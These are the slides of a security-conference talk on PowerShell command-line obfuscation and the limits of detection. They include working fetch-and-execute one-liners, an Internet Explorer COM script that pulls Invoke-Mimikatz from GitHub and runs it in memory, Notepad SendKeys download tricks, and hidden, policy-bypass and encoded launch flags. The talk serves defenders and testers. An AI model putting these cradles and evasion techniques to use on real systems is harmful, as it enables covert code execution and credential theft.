[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To) D""e`Tec`T 'Th'+'em' by Daniel Bohannon

Invoke-Obfuscation:
PowerShell obFUsk8tion
Techniques & How To (Try To)
D""e`Tec`T 'Th'+'em'
Daniel Bohannon
@danielhbohannon

Who I Am
• Daniel Bohannon
• @danielhbohannon , http://danielbohannon.com
• Blue Team w/increasing exposure to Red Team
• Incident Response Consultant @ Mandiant (1yr)
• Previously 5yrs in IT Operations and Security role for national restaurant
franchise

Outline:
• Motivation
• Preparing Your Environment for Investigating
PowerShell
• Obfuscation Example: (New-Object Net.WebClient)
• Additional Methods for Remote Download
• More Obfuscation Techniques and Detection Attempts
• Uncommon Encoding/Decoding Techniques
• Launch Techniques
• Invoke-Obfuscation Demo

Motivation
• PowerShell as an attack platform and post-exploitation framework is an ever-
increasing trend
• Native and signed Windows binary in Windows Vista and later
• Memory only execution capabilities (evade A/V and application whitelisting)
• Ever-expanding set of attack frameworks
• Used by advanced attackers, script kiddies and penetration testers in both
targeted attacks and commodity malware
• Nearly impossible to detect if command line arguments and/or PowerShell
event logs are not logged and monitored

Motivation
• PowerShell can be used in every part of the attack lifecycle
• PowerShell can be executed from many different locations
• Registry: Poweliks, Kovter (mshta or rundll + ActiveXObject)
• File: .ps1/.vbs/.bat and scheduled task
• Macros: Word, Excel, etc.
• Remotely: PowerShell Remoting, PsExec, WMI
• At the end of the day the command will show up in command line arguments
for powershell.exe, right?

Motivation
• Current state of detection?
• Monitor and alert on certain strings/commands in command line arguments for
powershell.exe
• -EncodedCommand
• (New-Object Net.WebClient).DownloadString

Motivation
• Current state of detection?
• Monitor and alert on certain strings/commands in command line arguments for
powershell.exe
• -EncodedCommand
• (New-Object Net.WebClient).DownloadString
• Not the only way to write this function
• Not the only way to encode
• Not the only way to write this function
• Not the only way to remotely download

Motivation
• Know your options!
• I began documenting as many different ways as I could find to accomplish these two tasks:
• Encoding: -EncodedCommand
• Remote Download: (New-Object Net.WebClient).DownloadString
• I began experimenting with ways to obfuscate how these functions and commands
appeared in powershell.exe’s command line arguments
• I began looking for these techniques in my incident response investigations, public
malware samples/reports and current PowerShell penetration testing frameworks

Motivation
• My goal as we go through the findings:
• Blue Team – increased awareness of options so detection can adapt
• Detailed process auditing including command line arguments
• Improved PowerShell logging
• Active monitoring of this data
• Searching for known bad + indicators of obfuscation
• Red Team – increased awareness of options for evading detection
• Pros/Cons of each obfuscation technique we discuss
• Open Source Tool – Invoke-Obfuscation
• Make employment of these techniques simple
• Attackers are already obfuscating – test your detection capabilities

Preparing Your Environment for Investigating
PowerShell
• Logs (and retention) are your friend:
1. Enable
2. Centralize
3. MONITOR
• Process Auditing AND Command Line Process Auditing  Security EID 4688
• https://technet.microsoft.com/en-us/library/dn535776.aspx
• SysInternals’ Sysmon EID 1 is also a good option
• Real-time Process Monitoring
• Uproot IDS - https://github.com/Invoke-IR/Uproot
• PowerShell Module, Scriptblock, and Transcription logging
• https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
^ Matt Dunwoody (@matthewdunwoody)

Obfuscation Example: (New-Object Net.WebClient)
• Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• Veil
• downloaderCommand = "iex (New-Object Net.WebClient).DownloadString("http://%s:%s/%s")n“
• https://github.com/nidem/Veil/blob/master/modules/payloads/powershell/psDownloadVirtualAlloc.py#L76
• PowerSploit
• $Wpad = (New-Object Net.Webclient).DownloadString($AutoConfigURL)
• https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1#L1375
• Metasploit
• http://blog.cobaltstrike.com/2013/11/09/schtasks-persistence-with-powershell-one-liners/

• What process command line arguments can we monitor for this?

• Invoke-Expression

• New-Object

• New-Object
• System.Net.WebClient

• New-Object
• ).DownloadString("http

• New-Object
• Now let's demonstrate why assumptions are dangerous!

• New-Object
• System.Net.WebClient (System.* is not necessary for .Net functions)

• Invoke-Expression (New-Object Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• New-Object
• Net.WebClient

• Invoke-Expression (New-Object Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• New-Object
• Net.WebClient
• ).DownloadString("http (url is a string and can be concatenated)

• Invoke-Expression (New-Object Net.WebClient).DownloadString("ht"+"tps://bit.ly/L3g1t")
• New-Object
• Net.WebClient
• ).DownloadString("http (url is a string and can be concatenated)

• Invoke-Expression (New-Object Net.WebClient).DownloadString("ht"+"tps://bit.ly/L3g1t")
• New-Object
• Net.WebClient
• ).DownloadString("

• Invoke-Expression (New-Object Net.WebClient).DownloadString( 'ht'+'tps://bit.ly/L3g1t')
• New-Object
• Net.WebClient
• ).DownloadString(" (PowerShell string can be single or double quotes)
(…and did I mention whitespace?)
(…URL can also be set as variable.)

• New-Object
• Net.WebClient
• ).DownloadString(

• New-Object
• Net.WebClient
• ).DownloadString( (is .DownloadString the only method for Net.WebClient?)

• New-Object
• Net.WebClient
• ).DownloadString(
Net.WebClient class has options:
• .DownloadString
• .DownloadStringAsync
• .DownloadStringTaskAsync
• .DownloadFile
• .DownloadFileAsync
• .DownloadFileTaskAsync
• .DownloadData
• .DownloadDataAsync
• .DownloadDataTaskAsync
• etc.

• New-Object
• Net.WebClient
• ).Download

• New-Object
• Net.WebClient
• ).Download
(New-Object Net.WebClient) can be set as a variable:
$wc = New-Object Net.Webclient;
$wc.DownloadString( 'ht'+'tps://bit.ly/L3g1t')

• New-Object
• Net.WebClient
• .Download

• New-Object
• Net.WebClient
• .Download (Member token obfuscation?)

• Invoke-Expression (New-Object Net.WebClient).'DownloadString'( 'ht'+'tps://bit.ly/L3g1t')
• New-Object
• Net.WebClient
• .Download (single quotes…)

• Invoke-Expression (New-Object Net.WebClient)."DownloadString"( 'ht'+'tps://bit.ly/L3g1t')
• New-Object
• Net.WebClient
• .Download (double quotes…)

• Invoke-Expression (New-Object Net.WebClient)."Down`loadString"( 'ht'+'tps://bit.ly/L3g1t')
• New-Object
• Net.WebClient
• Download (tick marks??)

• Invoke-Expression (New-Object Net.WebClient)."Down`loadString"( 'ht'+'tps://bit.ly/L3g1t')
• New-Object
• Net.WebClient
• Download
Get-Help about_Escape_Characters

• Invoke-Expression (New-Object Net.WebClient)."`Dò`wn`lòa`d`Strìn`g"( 'ht'+'tps://bit.ly/L3g1t')
• New-Object
• Net.WebClient
• Download

• Invoke-Expression (New-Object Net.WebClient)."`Dò`w`N`lòÀ`d`S`T`Rì`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• New-Object
• Net.WebClient
• Download

• New-Object
• Net.WebClient
• Download

• New-Object
• Net.WebClient
• Download (Options: Use heavy Regex or remove this indicator)

• New-Object
• Net.WebClient
• Download
WebClient class has options:
• .DownloadString…
• .DownloadFile…
• .DownloadData…
• .OpenRead
• .OpenReadAsync
• .OpenReadTaskAsync

• New-Object
• Net.WebClient
• Download
DownloadString CAN be treated as a string or variable if .Invoke is used!
Invoke-Expression (New-Object Net.WebClient).("Down"+"loadString").Invoke(
$ds = "Down"+"loadString"; Invoke-Expression (New-Object Net.WebClient).
$ds.Invoke( 'ht'+'tps://bit.ly/L3g1t')

• New-Object
• Net.WebClient

• New-Object
• Net.WebClient
We have options…
1. (New-Object "`Nè`T`.`Wè`B`C`lìè`N`T")
2. (New-Object ("Net"+".Web"+"Client"))
3. $var1="Net."; $var2="WebClient"; (New-Object $var1$var2)

• Invoke-Expression (New-Object "`Nè`T`.`Wè`B`C`lìè`N`T")."`Dò`w`N`lòÀ`d`S`T`Rì`N`g"(
• New-Object
• Net.WebClient
We have options…
1. (New-Object "`Nè`T`.`Wè`B`C`lìè`N`T")
2. (New-Object ("Net"+".Web"+"Client"))
3. $var1="Net."; $var2="WebClient"; (New-Object $var1$var2)

• New-Object

• New-Object
• There aren't any aliases for New-Object cmdlet, so shouldn't this be safe to trigger on?
If only PowerShell wasn't so helpful…

• New-Object
• Get-Command  shows all available functions, cmdlets, etc.

• New-Object
• Get-Command  RETURNS A POWERSHELL OBJECT!!!

• New-Object
• Get-Command  RETURNS A POWERSHELL OBJECT!!! (which means we can invoke it)
• Invoke-Expression (Get-Command New-Object)
(but since we're dealing with a cmdlet we have more options than just Invoke-Expression)

• New-Object
• Get-Command  RETURNS A POWERSHELL OBJECT!!! (which means we can execute it)
• & (Get-Command New-Object)
• . (Get-Command New-Object)

• New-Object
• Get-Command  Wildcards are our friend…
• & (Get-Command New-Object)
• . (Get-Command New-Object)

• New-Object
• & (Get-Command New-Objec*)
• . (Get-Command New-Objec*)

• New-Object
• & (Get-Command New-Obje*)
• . (Get-Command New-Obje*)

• New-Object
• & (Get-Command New-Obj*)
• . (Get-Command New-Obj*)

• New-Object
• & (Get-Command New-Ob*)
• . (Get-Command New-Ob*)

• New-Object
• & (Get-Command New-O*)
• . (Get-Command New-O*)

• New-Object
• & (Get-Command *ew-O*)
• . (Get-Command *ew-O*)

• New-Object
• & (Get-Command *w-O*)
• . (Get-Command *w-O*)

• New-Object
• Get-Command  Did I mention Get-Command also has aliases?
• & (GCM *w-O*).
• . (GCM *w-O*)

• New-Object
• Get-Command  Did I mention Get-Command also has MORE aliases?
• & (GCM *w-O*).
• . (GCM *w-O*)
• & (COMMAND *w-O*).
• . (COMMAND *w-O*)

• New-Object
• Get-Command  Did I mention Get-Command also has MORE aliases?
• & (GCM *w-O*).
• . (GCM *w-O*)
COMMAND works because
PowerShell auto prepends "Get-"
to any command, so COMMAND
resolves to Get-Command.

• New-Object
• Get-Command  Can also be set with a string variable
• $var1="New"; $var2="-Object"; $var3=$var1+$var2; & (GCM $var3)
• & (GCM *w-O*).
• . (GCM *w-O*)

• Invoke-Expression ((New-Object "`Nè`T`.`Wè`B`C`lìè`N`T"). "`Dò`w`N`lòÀ`d`S`T`Rì`N`g"(
'ht'+'tps://bit.ly/L3g1t'))
• New-Object
• & (GCM *w-O*).
• . (GCM *w-O*)
PowerShell 1.0 syntax for calling Get-Command (no wildcards):
$ExecutionContext.InvokeCommand.GetCommand("New-Ob"+"ject",
[System.Management.Automation.CommandTypes]::Cmdlet)
$ExecutionContext.InvokeCommand.GetCmdlet("New-Ob"+"ject")
PowerShell 1.0 syntax for calling Get-Command (WITH wildcards):
$ExecutionContext.InvokeCommand.GetCommands("*w-
o*",[System.Management.Automation.CommandTypes]::Cmdlet,1)
$ExecutionContext.InvokeCommand.GetCmdlets("*w-o*")

• Invoke-Expression (& (GCM *w-O*) "`Nè`T`.`Wè`B`C`lìè`N`T")."`Dò`w`N`lòÀ`d`S`T`Rì`N`g"(
• New-Object
• & (GCM *w-O*).
• . (GCM *w-O*)

• New-Object || Get-Command || GCM || COMMAND
• Given wildcards it's infeasible to find all possible ways for Get-Command/GCM/COMMAND to
find and execute New-Object, so there is potential for false positives with this approach.
NOTE: Get-Command's
cousin is just as useful…
Get-Alias / Alias / GAL

• New-Object || Get-Command || GCM || COMMAND
• Ticks also work on PowerShell cmdlets

• Invoke-Expression (& (`G`C`M *w-O*)
"`Nè`T`.`Wè`B`C`lìè`N`T")."`Dò`w`N`lòÀ`d`S`T`Rì`N`g"( 'ht'+'tps://bit.ly/L3g1t')
• `Nè`w`-Ò`b`jè`c`T || `Gè`T`-`Cò`m`mà`N`d || `G`C`M || `CÒ`M`MÀ`N`D

• And so does Splatting
• & (‘Ne’+’w-Obj’+’ect’)
• . (‘Ne’+’w-Obj’+’ect’)

• And so does Splatting
• Once again, Regex all of these possibilities or remove this indicator

• What's potentially problematic about Invoke-Expression?

1. Aliases: Invoke-Expression / IEX
1. Invoke-Expression "Write-Host IEX Example -ForegroundColor Green"
2. IEX "Write-Host IEX Example -ForegroundColor Green"

2. Order
1. IEX "Write-Host IEX Example -ForegroundColor Green"
2. "Write-Host IEX Example -ForegroundColor Green" | IEX

.
2. Order
3. Ticks
1. ÌÈ`X
2. Ì`N`vò`kè`-È`x`p`Rè`s`sìò`N

.
2. Order
3. Ticks
4. Splatting
1. & ('I'+'EX')
2. . ('I'+'EX')

.
2. Order
3. Ticks
4. Splatting
5. Invoke-Expression vs Invoke-Command

• What's potentially problematic about "Invoke-Expression"???
2. Order
3. Ticks
4. Splatting
5. Invoke-Expression vs Invoke-Command
Cmdlet/Alias Example
Invoke-Command Invoke-Command {Write-Host ICM Example -ForegroundColor Green}
ICM ICM {Write-Host ICM Example -ForegroundColor Green}
.Invoke() {Write-Host ICM Example -ForegroundColor Green}.Invoke()
& & {Write-Host ICM Example -ForegroundColor Green}
. . {Write-Host ICM Example -ForegroundColor Green}

• Invoke-Expression || IEX || Invoke-Command || ICM || .Invoke() || … "&" or "." ?!?!?
• So we add the Invoke-Command family to our arguments…

• Invoke-Expression || IEX || Invoke-Command || ICM || .Invoke() || … "&" or "." ?!?!?
• Don’t forget about PS 1.0 syntax!
• $ExecutionContext.InvokeCommand.InvokeScript({Write-Host SCRIPTBLOCK})
• $ExecutionContext.InvokeCommand.InvokeScript("Write-Host EXPRESSION")

• Ì`N`Vò`kè`-È`x`p`Rè`s`sìò`N (& (`G`C`M *w-O*)
• Ì`N`Vò`kè`-È`x`p`Rè`s`sìò`N || ÌÈ`X || Ì`N`Vò`kè`-`Cò`m`mÀ`N`d || Ì`C`M ||
. "Ì`N`Vò`kè"( ) || … "&" or "." ?!?!?
• And add in ticks…

. "Ì`N`Vò`kè"( ) || … "&" or "." ?!?!?
• Can we reduce FPs by only triggering on "&" or "." when "{" and "}" are present?

. "Ì`N`Vò`kè"( ) || … "&" or "." ?!?!?
• Of course not, because we can convert strings to script blocks!

. "Ì`N`Vò`kè"( ) || … "&" or "." ?!?!?
• $scriptblock = [Scriptblock]::Create("Write-Host Script Block Conversion -ForegroundColor Green")
• $scriptblock = $ExecutionContext.InvokeCommand.NewScriptBlock("Write-Host Script Block Conversion -ForegroundColor Green")
• ^ PowerShell 1.0 syntax!

• Ì`N`vò`kè`-È`x`p`Rè`s`sìò`N || ÌÈ`X || Ì`N`Vò`kè`-`Cò`m`mÀ`N`d || Ì`C`M ||
. "Ì`N`Vò`kè"( ) || … "&" or "." ?!?!?
Ways to obfuscate scriptblock conversion (PowerShell v1.0)
1. $ExecutionContext.InvokeCommand.NewScriptBlock("expression")

. "Ì`N`Vò`kè"( ) || … "&" or "." ?!?!?
Ways to obfuscate scriptblock conversion (PowerShell v1.0)
1. $a = ${È`xè`cù`Tìò`N`Cò`N`Tè`x`T}; $b = $a."Ì`N`Vò`kè`Cò`m`mÀ`N`d";
$b."`Nè`w`S`c`Rì`p`T`B`lò`c`k"("ex"+"pres"+"sion")
1. Tick Member obfuscation
2. Ticks can be added to $ExecutionContext if curly braces are added
3. Command can be broken into multiple variables
4. Entire expression field can be chopped into substrings

. "Ì`N`Vò`kè"( ) || … "&" or "." ?!?!?
Ways to obfuscate scriptblock conversion (.Net version)
1. [Scriptblock]::Create("expression")

. "Ì`N`Vò`kè"( ) || … "&" or "." ?!?!?
Ways to obfuscate scriptblock conversion (.Net version)
1. ([Type]("Scr"+"ipt"+"block"))::("`C`Rè"+"À`Tè").Invoke("ex"+"pres"+"sion")
1. Entire expression field can be chopped into substrings
2. Quotes and ticks for Member token
3. Parentheses or variable + Invoke (then full-on string!)
4. Scriptblock can be type casted
1. [Scriptblock] equals [Type]"Scriptblock"

. "Ì`N`Vò`kè"( ) ||
• ("&" || ".") && (( { && } ) || (type || `S`c`rì`p`t`b`lò`c`k || `Nè`w`S`c`rì`p`t``B`lò`c`k ||
???))

• . ((${È`xè`cù`Tìò`N`Cò`N`Tè`x`T}."Ì`N`Vò`kè`Cò`m`mÀ`N`d").
"`Nè`w`S`c`Rì`p`T`B`lò`c`k"((& (`G`C`M *w-O*)
"`Nè`T`.`Wè`B`C`lìè`N`T")."`Dò`w`N`lòÀ`d`S`T`Rì`N`g"(
'ht'+'tps://bit.ly/L3g1t')))
….
. "Ì`N`Vò`kè"( ) ||
• ("&" || ".") && (( { && } ) || (type || `S`c`rì`p`t`b`lò`c`k || `Nè`w`S`c`rì`p`t``B`lò`c`k ||
???))

• . ((${È`xè`cù`Tìò`N`Cò`N`Tè`x`T}."Ì`N`Vò`kè`Cò`m`mÀ`N`d").
"`Nè`w`S`c`Rì`p`T`B`lò`c`k"((& (`G`C`M *w-O*)
"`Nè`T`.`Wè`B`C`lìè`N`T")."`Dò`w`N`lòÀ`d`S`T`Rì`N`g"(
'ht'+'tps://bit.ly/L3g1t')))
….
• Nothing definitive, unless you're okay with extremely complicated Regex combinations
• And this is only for Net.WebClient! What other options exist?

Additional Methods for Remote
Download
• Options for remote download in PowerShell:
• New-Object Net.WebClient
• PowerShell v3.0+
• Invoke-WebRequest / IWR
• Invoke-RestMethod / IRM
• .Net methods
• [System.Net.WebRequest]
• [System.Net.HttpWebRequest]
• [System.Net.FileWebRequest]
• [System.Net.FtpWebRequest]
IEX (New-Object System.IO.StreamReader
([Net.HttpWebRequest]::Create("$url").GetResponse()
.GetResponseStream())).ReadToEnd();
$readStream.Close(); $response.Close()
Default User-Agent string is:
Mozilla/5.0 (Windows NT; Windows NT 6.1; en-
US) WindowsPowerShell/3.0

Download
• Obscure ways to download remote scripts especially if PowerShell.exe is being
monitored for making network connections
Sysmon EID 3: Network
Connection

Download
• Obscure ways to download remote scripts especially if PowerShell.exe is being
monitored for making network connections

Download
• How can we do this in an automated fashion?
• How can we get this from Notepad into PowerShell?
PowerShell SendKeys!

Download
• PowerShell SendKeys (downloading remote code via Notepad.exe)
• $wshell = New-Object -ComObject wscript.shell
$wshell.run("notepad")
$wshell.AppActivate('Untitled - Notepad')
Start-Sleep 2
$wshell.SendKeys('^o')
Start-Sleep 2
$wshell.SendKeys('https://bit.ly/L3g1t')
$wshell.SendKeys('~')
Start-Sleep 5
$wshell.SendKeys('^a')
$wshell.SendKeys('^c')
# Execute contents in clipboard back in PowerShell process
[void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms')
$clipboardContents = [System.Windows.Forms.Clipboard]::GetText()
$clipboardContents | powershell -
Simulates interactive prompt, so Enter
can be used instead of Invoke-Expression
or Invoke-Command

Download
• PowerShell SendKeys
• $wshell = New-Object -ComObject wscript.shell
$wshell.run("notepad") / Start-Process notepad
$wshell.AppActivate('Untitled - Notepad')
Start-Sleep 2
$wshell.SendKeys('command goes here')
• .Net SendKeys (basically silent in PowerShell logs)
• [void] [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.VisualBasic")
[void] [Diagnostics.Process]::Start("notepad")
[void] [Microsoft.VisualBasic.Interaction]::AppActivate("Untitled - Notepad")
[void] [System.Threading.Thread]::Sleep(2000)
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
[void] [System.Windows.Forms.SendKeys]::SendWait("command goes here")
Add'l Ways To Start A New Process:
Start-Process notepad
& notepad
. notepad
notepad
[Diagnostics.Process]::Start("notepad“)
Invoke-Item/ii notepad.exe

Download
• SendKeys approach works with almost any application with GUI Open File
functionality:
• Notepad
• Wordpad
• Winword
• Excel
• PowerShell_ISE

Download
• SendKeys is fun but sloppy. What other options exists?
Com Objects (MsXml2.XmlHttp & InternetExplorer.Application)
$url = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-
Mimikatz.ps1"
$objIE = New-Object -Com InternetExplorer.Application
While($objIE.Busy) {Start-Sleep -Seconds 1}
$objIE.Visible = $false
$objIE.Navigate($url)
While($objIE.Busy) {Start-Sleep -Seconds 1}
IEX $objIE.Document.Body.InnerText; Invoke-Mimikatz
IExplore is potentially the cleanest method. Nothing hits disk, blends in
with regular user browsing activity, and uses target system’s User Agent.

More Obfuscation Techniques and Detection Attempts
• Additional command line obfuscation techniques via string manipulation
• Treat entire PowerShell command as a string and then manipulate at a string
level
• Reverse string
• Split string
• Replace/Reorder string
• Concatenate string

• Reverse string: $reverseCmd = ")'t1g3L/yl.tib//:sptth'(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-weN(";
1. Traverse the string in reverse and join it back together
IEX ($reverseCmd[-1..-($reverseCmd.Length)] -Join '') | IEX
2. Cast string to char array and use .Net function to reverse and then join it back together
$reverseCmdCharArray = $reverseCmd.ToCharArray(); [Array]::Reverse($reverseCmdCharArray);
IEX ($reverseCmdCharArray -Join '') | IEX
3. .Net Regex the string RightToLeft and then join it back together
IEX (-Join[RegEx]::Matches($reverseCmd,'.','RightToLeft')) | IEX
SUPPLEMENTAL

• Reverse string
• Split string: $cmdWithDelim = "(New-Object Net.We~~bClient).Downlo~~adString('https://bi~~t.ly/L3g1t')";
1. Split the string on the delimiter and join it back together
IEX ($cmdWithDelim.Split("~~") -Join '') | IEX
SUPPLEMENTAL

• Reverse string
• Split string:
• Replace string: $cmdWithDelim = "(New-Object Net.We~~bClient).Downlo~~adString('https://bi~~t.ly/L3g1t')";
1. PowerShell's .Replace
IEX $cmdWithDelim.Replace("~~","") | IEX
2. .Net's -Replace (and -CReplace which is case-sensitive replace)
IEX ($cmdWithDelim -Replace "~~","") | IEX
3. PowerShell's -f format operator
IEX ('({0}w-Object {0}t.WebClient).{1}String("{2}bit.ly/L3g1t")' -f 'Ne', 'Download','https://') | IEX
SUPPLEMENTAL

• Reverse string
• Split string:
• Replace string:
• Concatenate string: $c1="(New-Object Net.We"; $c2="bClient).Downlo"; $c3="adString('https://bit.ly/L3g1t')";
1. PowerShell's -Join (w/o delimiter)
IEX ($c1,$c2,$c3 -Join '') | IEX
2. PowerShell's -Join (with delimiter)
IEX ($c1,$c3 -Join $c2) | IEX
3. .Net's Join
IEX ([string]::Join($c2,$c1,$c3)) | IEX
4. .Net's Concat
IEX ([string]::Concat($c1,$c2,$c3)) | IEX
5. + operator / concat without + operator
IEX ($c1+$c2+$c3) | IEX / IEX "$c1$c2$c3" | IEX
SUPPLEMENTAL

• Detecting some of these obfuscation techniques
• Look for presence of some of these string manipulation functions
• Reverse, Split, Replace, Concat, -f format operator
• Look for high count of certain characters
• $ (for setting/referencing variables)
$c1="com"; $c2="mand"; $c3=" goes here" Set-Variable/SV/Set and Get-Variable/Variable/GV
• ; (for executing multiple commands)
$c1="com"; $c2="mand"; $c3=" goes here" 1 | % {cmd1} {cmd2} {cmd3}
• + (for concatenating strings)
$c1+$c2+$c3 "$c1$c2$c3"
• You can also substitute chars with [char] (so ; is [char]59)
$cmd = "$c1~~$c2~~$c3~~$c4"; IEX $cmd.Replace("~~",[string]([char]59)) | IEX

Uncommon Encoding/Decoding Techniques
• So what are hackers actually using to obfuscate their PowerShell activity?
• PowerShell's -EncodedCommand

• Copy/Pasted by toolsmiths, scriptkiddies, and hackers alike
• "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"
• powershell -ep bypass -enc <Paste in the Encoded Text>
• powershell.exe -NoP -NonI -W Hidden -Enc <base64 encoded command>
-NoP (-NoProfile)
-NonI (-NonInteractive)
-NoL (-NoLogo)
-W Hidden (-WindowStyle Hidden)
-EP Bypass (-ExecutionPolicy Bypass)

-NoP (-NoProfile)
-NoL (-NoLogo)
-WindowStyle Hidden
1. -W Hidden
2. -Win Hidden
3. -Window
Hidden
-ExecutionPolicy
Bypass/Unrestricted
1. -EP Bypass
2. -Exec Bypass
3. -Execution Bypass
-EncodedCommand
1. -E
2. -Enc
3. -Encoded

-NoP (-NoProfile)
-NoL (-NoLogo)
Can also by set/bypassed via:
1. PowerShell's AuthorizationManager
2. HKLMSOFTWAREMicrosoftPowerShell1
ShellIdsMicrosoft.PowerShellExecutionP
olicy
-WindowStyle Hidden
1. -W Hidden
2. -Win Hidden
3. -Window
Hidden
-ExecutionPolicy
Bypass/Unrestricted
1. -EP Bypass
2. -Exec Bypass
3. -Execution Bypass
-EncodedCommand
1. -E
2. -Enc
3. -Encoded
SUPPLEMENTAL

• -EncodedCommand
• -Encoded
• -Enc
• -EC
• -E
Are these indicators sufficient?
1. " -EncodedCommand "
2. " -Encoded "
3. " -Enc "
4. " -EC "
5. " -E "

• -EC
• -EncodedCommand

• -EC
• -EncodedCommand
• -EncodedComman

• -EC
• -EncodedCommand
• -EncodedComman
• -EncodedComma

• -EC
• -EncodedCommand
• -EncodedComman
• -EncodedComma
• -EncodedComm
• -EncodedCom
• -EncodedCo
• -EncodedC
• -Encoded
• -Encode
• -Encod
• -Enco
• -Enc
• -En
• -E
PowerShell auto-appends * to flags
-NoP (-NoProfile)
-NoL (-NoLogo)

• .Net's Base64 methods
• ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encodedCommand)))
• sal a New-Object; IEX(a IO.StreamReader((a
IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($encodedCommand),[I
O.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

• Different ways of encoding…ASCII/hex/octal/binary/BXOR/etc.
• [Convert]::ToString(1234, 2)
• "{0:X4}" -f 1234
• [Byte][Char]([Convert]::ToInt16($_,16))
• ($cmd.ToCharArray() | % {[int]$_}) -Join $delim (whitespace unnecessary: )-Join$delim)
• $bytes[$i] = $bytes[$i] -BXOR 0x6A (whitespace unnecessary: $bytes[$i]-BXOR0x6A)
When used on command line these are
constrained by a limit of 8,191 characters.
https://support.microsoft.com/en-us/kb/830473

• Different ways of encoding…ASCII/hex/octal/binary/BXOR/etc.
• Storing PowerShell command/script in a SecureString password object

• How about a different way for encoding in PowerShell…
• Passwords in PowerShell? SecureString! (since PS 1.0)
http://www.adminarsenal.com/admin-arsenal-blog/secure-password-with-powershell-encrypting-credentials-part-1/
http://www.adminarsenal.com/admin-arsenal-blog/secure-password-with-powershell-encrypting-credentials-part-2/
SUPPLEMENTAL

• $secPwd = Read-Host "Enter password" -AsSecureString
• $secPwd = "password" | ConvertTo-SecureString -AsPlainText -Force
SUPPLEMENTAL

• $secPwd = Read-Host "Enter password" -AsSecureString
• $secPwd = "password" | ConvertTo-SecureString -AsPlainText -Force
• $secPwdPlaintext = $secPwd | ConvertFrom-SecureString
• So when no key is specified then the user and computername are used as the key, so this
SecureString should only be able to reasonably be decrypted on the same system by the
same user (or any process running under this user context).
SUPPLEMENTAL

• However, when a key is specified (byte array or SecureString) then the value is always the
same on any system/user combination as long as you have the same key.
• So a password I SecureString with key (1..16) on my system you can successfully un-
SecureString on your system as long as you also have key (1..16).
• Size restriction on SecureString? 65,536 characters!
So massive password…
or perhaps an entire script?
SUPPLEMENTAL

• What if I don't care about SecureString for securing passwords but want to use it strictly
for encoding/decoding full commands/scripts?
• $cmd = "IEX (IWR $url).Content"
$secCmd = ConvertTo-SecureString $cmd -AsPlainText -Force
$secCmdPlaintext = $secCmd | ConvertFrom-SecureString -Key (1..16)
• (on target system)
$secCmd = $secCmdPlaintext | ConvertTo-SecureString -Key (1..16)
([System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServ
ices.Marshal]::SecureStringToBSTR($secCmd))) | IEX

Launch Techniques
• So let’s assume your Regex is great
• Applied to every execution of powershell.exe
• Any problems here?

Launch Techniques
• So let’s assume your Regex is great
• Applied to every execution of powershell.exe
• Any problems here?
1. Unmanaged PowerShell (PowerShell w/o powershell.exe)
1. Loading of System.Management.Automation.dll
2. (still shows up in Scriptblock and Module logging)
2. Convoluted LAUNCH techniques for powershell.exe

Launch Techniques
• powershell /? provides us with a fun syntax for abstracting command line
arguments via standard input.

Launch Techniques
• powershell.exe called by cmd.exe
• cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"

Launch Techniques
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"

Launch Techniques
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"

Launch Techniques
..

Launch Techniques
..
Is it safe to key off of cmd.exe with arguments "| powershell *"??
Of course not! "powershell" can be set and called as variables in cmd.exe
cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|
%p1%%p2% - "
SUPPLEMENTAL

• cmd.exe /c "set cmd=Write-Host ENV -Fore Green&& powershell IEX $env:cmd"
Launch Techniques
Already seen in the wild. Javascript sets PowerShell command in environment
variable and then PowerShell retrieves and executes it.
http://blog.airbuscybersecurity.com/post/2016/03/FILELESS-MALWARE-%E2%80%93-A-
BEHAVIOURAL-ANALYSIS-OF-KOVTER-PERSISTENCE

Launch Techniques
Can also use .Net function or GCI/dir or Get-Variable:
[Environment]::GetEnvironmentVariable('cmd', 'Process')
(Get-ChildItem/ChildItem/GCI/DIR/LS env:cmd).Value
Get-Variable/Variable/GV cmd -ValueOnly (-V thru –ValueOnly)
(Get-Variable/Variable/GV cmd).Value
SUPPLEMENTAL

Launch Techniques
• cmd.exe /c "echo Write-Host CLIP -Fore Green | clip&& powershell [void]
[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'
); IEX ([System.Windows.Forms.Clipboard]::GetText())"
